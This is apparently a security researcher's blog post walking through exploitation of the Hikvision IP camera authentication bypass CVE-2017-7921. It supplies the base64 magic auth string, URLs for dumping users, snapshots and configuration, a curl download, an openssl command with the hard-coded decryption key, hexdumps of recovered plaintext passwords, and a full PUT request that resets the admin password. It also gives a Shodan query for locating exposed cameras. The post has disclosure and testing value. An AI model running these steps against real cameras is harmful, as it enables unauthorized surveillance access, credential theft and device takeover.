Recently, I bumped into a bunch of Hikvision camera’s during a security engagement and surprise, surprise, they were all vulnerable against this old vulnerability CVE-2017-7921 discovered by Monte Crypto in September 2017. You can find his write up here: https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html.

It made me curious, because we are five years further in the game and it looks that the majority of the Hikvison camera’s and other white-labelled versions are still vulnerable.
I ran a quick scan with Shodan (search: “App-webs” “200 OK”) and it returns around 160.000 potential targets where, based on my quick assessment, probably 20% remains vulnerable !!!

This is of course bad or good news depending which side you are on ;–), but regardless if you are a good or bad actor, it does make sense to revisit this old timer once more again.

A small deep dive into the problem

Many Hikvision IP cameras contain a backdoor have improper authorization logic that allows unauthenticated impersonation of any configured user account.
The basics of this vulnerability is very simple.

Updated based on the comment of @gwillcox-r7
Our dear programmers from Hikvision left a piece of a code in the vulnerable firmware that has a hard coded magic string that bypasses all security on the camera and will provide full admin access. Our dear programmers from Hikvision developed proprietary HikCGI protocol, which exposes URI endpoints through the camera’s web interface. The HikCGI protocol handler checks for the presence of a parameter named auth in the query string and if that parameter contains a base64-encoded username:password string, the HikCGI API call assumes the identity of the specified user and the password is ignored.
Using user admin bypasses all security on the camera and allows an attacker to completely control the camera and modify any setting or retrieve sensible information.

You use any combination of base64 encoded admin:password string, such as the one below.

# echo "admin:11" | base64
YWRtaW46MTEK

All what is needed is to append this magic string ?auth=YWRtaW46MTEK to GET and POST queries to access the camera with administrative privileges and do whatever you want.

Examples are:
Retrieve a list of all users and their roles: http://camera.ip/Security/users?auth=YWRtaW46MTEK
Obtain a camera snapshot without authentication: http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
or one can download the camera configuration: http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

And the use cases for exploitation are numerous, as described in the HIKCGI Integration Guide and IP Media Device Management Protocol User Guide from Hikvision.

Let me take two use cases to show how easy it is to retrieve users and passwords and change them.

First of all, if you want to retrieve the users and passwords, just first pull the configuration file from the vulnerable camera using the magic string.

curl http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK --output configurationFile

You should get a file named configurationFile which holds all camera information including the user and password information in plain text.
However this file is encrypted (rather weak ;-0), so we need to decrypt it first.

There is a nice tool made by WormChickenWizard that will the job for us. Check it out, but for now I just apply the logic that he described in his README.md.

First decrypt the configurationFile with following command:

openssl enc -d -in configurationFile -out decryptedoutput -aes-128-ecb -K 279977f62f6cfd2d91cd75b889ce0c9a -nosalt -md md5

The AES encryption is now broken but the decryptedoutput file is still xor encoded.
Use the tool from WormChickenWizard to decrypt the decrytedoutput file to create a readable format that we can view with a hex editor to search for the users and passwords in plain text format.

java XORDecode

You should now have a file called plaintextOutput file that you can inspect with a hex viewer or editor.

hexedit plaintextOutput

You will see output like this and the first admin and password you will find is the default admin password when your perform a factory reset (I love these Hikvision developers ;–)

00008358   02 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  ....................................
0000837C   00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  ....................................
000083A0   00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  ....................................
000083C4   00 00 00 00  61 64 6D 69  6E 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  ....admin...........................
000083E8   31 32 33 34  35 00 00 00  00 00 00 00  00 00 00 00  FF FF FF FF  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  12345...............................
0000840C   00 00 00 00  00 00 00 00  00 00 00 00  00 00 02 02  00 00 00 00  FF FF FF FF  00 00 00 00  FF FF FF FF  00 00 00 00  ....................................
00008430   FF FF FF FF  00 00 00 00  FF FF FF FF  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  ....................................
00008454   00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  ....................................
00008478   00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  ....................................
---  plaintextOutput       --0x801C/0xD8B30--4%---------------------------------------------------------------------------------------------------------------------

If you search a bit further, you will find the actual users and passwords. In this case two users (admin and admln)

000A7BD4   00 00 00 00  08 10 00 00  00 00 00 00  61 64 6D 69  6E 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  ............admin...................
000A7BF8   00 00 00 00  00 00 00 00  50 61 24 24  57 30 72 64  00 00 00 00  00 00 00 00  FF FF FF FF  00 00 00 00  00 00 00 00  ........Pa$$W0rd....................
000A7C1C   00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 02 02  00 00 00 00  FF FF FF FF  00 00 00 00  ....................................
000A7C40   FF FF FF FF  00 00 00 00  FF FF FF FF  00 00 00 00  FF FF FF FF  00 00 00 00  61 64 6D 6C  6E 00 00 00  00 00 00 00  ........................admln.......
000A7C64   00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  61 73 64 66  31 32 33 34  00 00 00 00  00 00 00 00  ....................asdf1234........
000A7C88   00 70 0D 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  00 00 02 01  .p..................................
000A7CAC   00 00 00 00  01 00 00 00  00 00 00 00  01 00 00 00  00 00 00 00  01 00 00 00  00 00 00 00  01 00 00 00  00 00 00 00  ....................................
---  plaintextOutput       --0xA7850/0xD8B30--77%-------------------------------------------------------------------------------------------------------------------

Now if this is all too much effort, you can also decide to just reset the admin password with a new password.
The HTML code for that is pretty simple and can be easily executed using burp

Note: The new password should at least have 2 UPPERCASE, 2 lowercase and 2 special characters, otherwise it will not be accepted.

Burp request:

PUT /Security/users/1?auth=YWRtaW46MTEK HTTP/1.1

<?xml version="1.0" encoding="UTF-8"?>
<User version="1.0" xmlns="http://www.hikvision.com/ver10/XMLSchema">
<id>1</id>
<userName>admin</userName>
<password>Pa$$W0rd</password>
</User>

To fix CVE-2017-7921, we recommend that users upgrade their Hikvision firmware to the latest version, but looking at the number of vulnerable camera’s out there, this will probably not help :–(.

References

I have added a reference to a Metasploit module that I developed and checks for a vulnerable camera and does the password reset for you.
I am currently updating the functionality of this module with some more actions to retrieve the config file, make a snapshot, enumerate the users and other stuff…
This module will be submitted shortly to the mainstream of Metasploit for acceptance of the Rapid7 development team.

Metasploit Hikvision module –> https://github.com/h00die-gr3y/Metasploit/

Update 24 September 2022:
Metasploit Hikvision module has been released to the mainstream –> https://github.com/rapid7/metasploit-framework/pull/17033